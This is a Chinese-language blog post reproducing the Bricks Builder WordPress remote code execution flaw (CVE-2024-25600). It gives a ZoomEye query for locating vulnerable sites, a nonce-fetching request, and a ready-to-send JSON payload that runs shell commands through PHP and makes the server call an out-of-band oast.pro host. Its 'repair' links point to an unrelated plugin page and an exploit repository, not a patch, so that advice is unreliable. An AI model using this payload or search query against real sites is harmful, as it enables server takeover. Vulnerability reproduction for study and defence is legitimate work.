WordPress Bricks Builder远程命令执行漏洞(CVE-2024-25600)

Administrator 字数: 4032 阅读耗时: 10 分钟 2024/05/15 博客独享热度: 24 评论: 0

0x00写在前面

本次测试仅供学习使用，如若非法他用，与本平台和发布者无关，需自行负责！

0x01漏洞介绍

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。

Bricks Builder是一款面向WordPress网站建设的可视化编辑器，使用简单、功能强大。它提供了多种布局和预设模板，可以帮助用户快速创建专业、美观的网站。该产品存在远程代码执行漏洞。

0x02影响版本

Bricks Builder <= 1.9.6

0x03漏洞复现

zoomeye语法

web.body="/wp-content/themes/bricks/"

1.访问漏洞环境

2.对漏洞进行复现

POC （GET）

漏洞复现，获取nonce值

GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:96.0) Gecko/20100101 Firefox/96.0
Connection: close
Accept-Encoding: gzip, deflate

执行payload

POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Connection: close
Content-Length: 401
Content-Type: application/json
Accept-Encoding: gzip, deflate

{
  "postId": "1",
  "nonce": "c5b5949**",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `curl cnc4ej5blq62an78ck6giyhcffmdr5t56.oast.pro`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

DNSlog执行成功（漏洞存在）

3.nuclei工具测试（漏洞存在）

0x04修复建议

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

https://wordpress.org/plugins/html5-video-player/
https://github.com/Chocapikk/CVE-2024-25600